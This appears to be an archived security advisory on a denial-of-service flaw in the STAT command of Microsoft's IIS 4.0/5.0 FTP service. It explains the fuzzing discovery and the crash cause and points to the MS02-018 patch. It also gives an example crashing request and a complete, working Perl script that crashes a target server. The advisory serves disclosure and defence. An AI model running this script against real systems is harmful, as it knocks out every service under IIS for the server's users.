|
COMMAND Microsoft FTP Service DoS using STAT Globbing SYSTEMS AFFECTED IIS 5.0 IIS 4.0 PROBLEM H D Moore [http://www.digitaloffense.net/] found following : The Microsoft FTP service is vulnerable to a Denial of Service attack in the STAT command. This DoS can be triggered by a remote attacker using either a valid user account or the anonymous account, which is enabled by default. Once exploited, all services running under the inetinfo.exe process will terminate. On IIS 5.0 and above, these services are supposed to restart, on IIS 4.0 the services must be restarted manually. This vulnerability appears to be impossible to exploit to gain a remote command shell. Versions other than 4.0 and 5.0 were not tested. Details ======= This vulnerability was discovered in November 2001 by a \"fuzzer\" script I wrote to audit FTP daemons for problems in the globbing functionality. This script created and sent random arguments to the \"STAT\" command consisting of various combinations of globbing characters. The original fuzzer had to be modified to use the Windows glob characters instead of the normal Unix set. Within 20 seconds the script had caused an access violation on a fully patched IIS server. An example request which can cause the crash: STAT ?*<240 x X> The crash occurs when a memchr call is passed a pointer which dereferences to a NULL. It may be possible to overwrite this memory with an arbitrary path and use this exploit to obtain a directory listing, but all attempts so far have failed and constantly restarting IIS and retrying was getting old. Scripts ======= DoS Proof of Concept #!/usr/bin/perl -w ################## ################## # # # URL: http://www.digitaloffense.net/ # EMAIL: hdm@digitaloffense.net # USAGE: ./msftp_dos.pl <target ip> # # Summary: # # The Microsoft FTP service contains a vulnerability in the STAT # command with the pattern-matching (glob) code. This vulnerability # could be exploited to execute a Denial of Service attack. This # affects IIS 4.0 and 5.0 and requires the attacker to be able to # access the service either through a valid user account or via the # anonymous login which is enabled by default. The DoS attack will # bring down all services running under IIS (the inetinfo.exe process). # # IIS 4.0 must be manually restarted to restore normal operation. IIS 5.0 # will automatically restart the crashed services, but any users connected # to the service at the time of exploitation must reconnect. # # At this time, there seems to be a slim-to-none chance of being able to # execute arbitrary code through this vulnerability. # # Solution: # # http://www.microsoft.com/technet/security/bulletin/MS02-018.asp # use Net::FTP; $target = shift() || die \"usage: $0 <target ip>\"; my $user = \"anonymous\"; my $pass = \"crash\\@burn.com\"; my $exp = (\"A\" x 240); print \":: Trying to connect to target system at: $target...\\n\"; $ftp = Net::FTP->new($target, Debug => 0, Port => 21) || die \"could not connect: $!\"; $ftp->login($user, $pass) || die \"could not login: $!\"; $ftp->cwd(\"/\"); print \":: Trying to crash the FTP service...\\n\"; $ftp->quot(\"STAT *?\" . $exp); $ftp->quit; SOLUTION Patch available at http://www.microsoft.com/technet/security/bulletin/MS02-018.asp Credits ======= The following people helped in one form or another: * bind * rkl * halvar * tsnoop * ah / da (vulnhelp)